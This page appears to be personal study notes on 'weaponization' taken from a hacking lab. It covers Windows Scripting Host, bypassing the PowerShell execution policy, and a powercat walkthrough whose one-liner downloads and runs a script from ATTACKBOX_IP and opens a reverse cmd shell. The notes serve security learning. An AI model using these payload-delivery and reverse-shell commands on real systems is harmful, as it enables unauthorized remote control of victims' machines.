CyberNotes
Weaponization

Notes

A collection of notes I have taken throughout my journey

Windows Scripting Host

Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system.

wscript hello.vbs
  • If the VBS files are blacklisted, then we can rename the file to .txt file and run it using wscript as follows,
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

PowerShell

Execution Policy

PowerShell's execution policy is a security option to protect the system from running malicious scripts. By default, Microsoft disables executing PowerShell scripts .ps1 for security purposes. The PowerShell execution policy is set to Restricted, which means it permits individual commands but not run any scripts.

You can determine the current PowerShell setting of your Windows:

PS C:\Users\thm> Get-ExecutionPolicy

To change:

PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Bypass Execution Policy

Microsoft provides ways to disable this restriction. One of these ways is by giving an argument option to the PowerShell command to change it to your desired setting. For example, we can change it to bypass policy which means nothing is blocked or restricted. This is useful since that lets us run our own PowerShell scripts.

In order to make sure our PowerShell file gets executed, we need to provide the bypass option in the arguments as follows,

C:\Users\thm\Desktop>powershell -ex bypass -File thm.ps1

Powercat

Netcat: The powershell version.

  1. Set up a web server to serve the powercat.ps1 that will be downloaded and executed on the target machine.
  2. Change the directory to powercat and start listening on a port of your choice. In our case, we will be using port 8080.
  3. Set up a listener on any port using nc to receive the connection back from the victim. We are using port 1337.
user@machine$ cd powercat 
user@machine$ python3 -m http.server 8080
// New Terminal Window or Tab
user@machine$  nc -lvp 1337
  1. Now, from the victim machine, we download the payload and execute it using PowerShell payload.
 
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"

Download

https://github.com/besimorhino/powercat

HTA

An HTML Application (HTA) is a Microsoft Windows program that combines HTML, Dynamic HTML, and scripting languages supported by Internet Explorer, such as VBScript or JScript, to create a desktop application-like interface

cURL

cURL is a command-line tool and library for transferring data using various network protocols

On this page